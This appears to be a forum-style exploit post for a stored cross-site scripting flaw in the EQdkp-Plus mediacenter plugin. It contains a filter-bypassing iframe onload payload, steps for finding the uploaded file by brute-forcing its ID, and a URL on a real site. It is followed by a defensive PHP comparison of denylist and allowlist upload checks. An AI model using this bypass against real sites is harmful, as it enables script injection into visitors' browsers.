[code=plugins/mediacenter/include/mediacenter.class.php:421]
function check_content($fieldname){
    $disallowed = "body|head|html|img|plaintext|a href|pre|script|table|title|php";
    $disallowed_content = explode('|', $disallowed);
    if (empty($disallowed_content))
    {
        return false;
    }
[/code]
To get around this filter, you can use the following construct:
[code]
<iframe src="http://yandex.ru" style="display: none" onload="alert('XSS')">
</iframe>
[/code]
After uploading the file to the server, you can find it with a request to:
http://site.com/dkp/plugins/mediacen...p?mode=ajax&id=[ID]
[ID] is found by simple exhaustive search.
Example:
http://www.eqdkp-plus.com/demo06/dat...a3825c2494f2/mediacenter/thumbs_b/ee5bb2c59c237307d61bcb0bae1e08f2.htm
Vulnerable versions: <=0.6.4.5
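
The following is an added example, not part of the original post and not code from EQdkp-Plus. It contrasts the token denylist quoted above with an allowlist check on uploaded files. The matching logic in `denylist_accepts()` is an assumption (the quoted function is cut off before it), and `allowlist_accepts()` and the sample file names are hypothetical.

```php
<?php
// Added illustration; not code from the EQdkp-Plus mediacenter plugin.
// Requires PHP 7+ with the fileinfo extension.

// Token list copied from check_content() as quoted in the post.
const DISALLOWED = "body|head|html|img|plaintext|a href|pre|script|table|title|php";

// ASSUMPTION: content is rejected when it contains any token as a
// case-insensitive substring. The post does not show the real matching code.
function denylist_accepts(string $content): bool
{
    foreach (explode('|', DISALLOWED) as $token) {
        if (stripos($content, $token) !== false) {
            return false;
        }
    }
    return true;
}

// Hypothetical hardened check: the extension AND the sniffed MIME type must
// both be on a short allowlist of image types, and must agree with each other.
function allowlist_accepts(string $filename, string $content): bool
{
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'png' => 'image/png',  'gif'  => 'image/gif'];
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return false; // .htm, .html, .php and anything else unlisted
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($content);
    return $mime === $allowed[$ext];
}

// Constructed samples: the markup from the post and a minimal GIF header.
$html = '<iframe src="http://yandex.ru" style="display: none" onload="alert(\'XSS\')"></iframe>';
$gif  = "GIF89a\x01\x00\x01\x00\x00\x00\x00;";

var_dump(denylist_accepts($html));                // markup checked against the token list
var_dump(allowlist_accepts('upload.htm', $html)); // HTML under an .htm name
var_dump(allowlist_accepts('upload.gif', $html)); // HTML under an image name
var_dump(allowlist_accepts('upload.gif', $gif));  // image content under an image name
```

None of the listed tokens occurs in the `<iframe>` markup, so a substring denylist cannot catch it. The allowlist never has to recognise the markup at all, because it only admits content that positively identifies as an image.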